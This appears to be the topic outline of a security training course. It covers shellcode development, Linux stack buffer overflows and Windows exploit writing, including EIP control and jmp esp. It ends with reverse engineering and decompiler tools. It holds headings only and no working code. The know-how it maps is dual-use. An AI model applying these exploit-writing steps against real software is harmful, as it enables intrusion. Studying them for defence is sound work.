Shellcodes
o NULL Byte
o Types of Shellcodes
Tools Used for Shellcode Development
o NASM
o GDB
o objdump
o ktrace
o strace
o readelf
Steps for Writing a Shellcode
Issues Involved With Shellcode Writing
o Addressing problem
o Null byte problem
o System call implementation
Smashing the Stack for Fun and Profit
What is a Buffer?
Static Vs Dynamic Variables
Stack Buffers
Data Region
Memory Process Regions
What Is A Stack?
Why Do We Use A Stack?
The Stack Region
Stack frame
Stack pointer
Procedure Call (Procedure Prolog)
Compiling the code to assembly
Call Statement
Return Address (RET)
Word Size
Stack
Buffer Overflows
Error
Why do we get a segmentation violation?
Segmentation Error
Instruction Jump
Guess Key Parameters
Calculation
Shell Code
o The code to spawn a shell in C
Let's try to understand what is going on here. We'll start by studying main:
execve()
o execve() system call
exit.c
o List of steps with exit call
The code in Assembly
JMP
Code using indexed addressing
Offset calculation
shellcodeasm.c
testsc.c
Compile the code
NULL byte
shellcodeasm2.c
testsc2.c
Writing an Exploit
overflow1.c
Compiling the code
sp.c
vulnerable.c
NOPs
o Using NOPs
o Estimating the Location
Windows Based Buffer Overflow Exploit Writing
Buffer Overflow
Stack overflow
Writing Windows Based Exploits
Exploiting stack based buffer overflow
OpenDataSource Buffer Overflow Vulnerability Details
Simple Proof of Concept
Windbg.exe
Analysis
EIP Register
o Location of EIP
o EIP
Execution Flow
But where can we jump to?
Offset Address
The Query
Finding jmp esp
Debug.exe
listdlls.exe
Msvcrt.dll
Out.sql
The payload
ESP
Limited Space
Getting Windows API/function absolute address
Memory Address
Other Addresses
Compile the program
Final Code
Reverse Engineering
Positive Applications of Reverse Engineering
Ethical Reverse Engineering
World War Case Study
DMCA Act
What is a Disassembler?
Why do you need to decompile?
Professional Disassembler Tools
Tool: IDA Pro
Convert Machine Code to Assembly Code
Decompilers
Program Obfuscation
Convert Assembly Code to C++ code
Machine Decompilers
Tool: dcc
Machine Code of compute.exe Program
Assembly Code of compute.exe Program
Code Produced by the dcc Decompiler in C
Tool: Boomerang
What Boomerang Can Do?
Andromeda Decompiler
Tool: REC Decompiler
Tool: EXE To C Decompiler
Delphi Decompilers
Tools for Decompiling .NET Applications
Salamander .NET Decompiler
Tool: LSW DotNet-Reflection-Browser
Tool: Reflector
Tool: Spices NET.Decompiler
Tool: Decompilers.NET
.NET Obfuscator and .NET Obfuscation
Java Bytecode Decompilers
Tool: JODE Java Decompiler
Tool: JREVERSEPRO
Tool: SourceAgain
Tool: ClassCracker
Python Decompilers
Reverse Engineering Tutorial
OllyDbg Debugger
How Does OllyDbg Work?
Debugging a Simple Console Application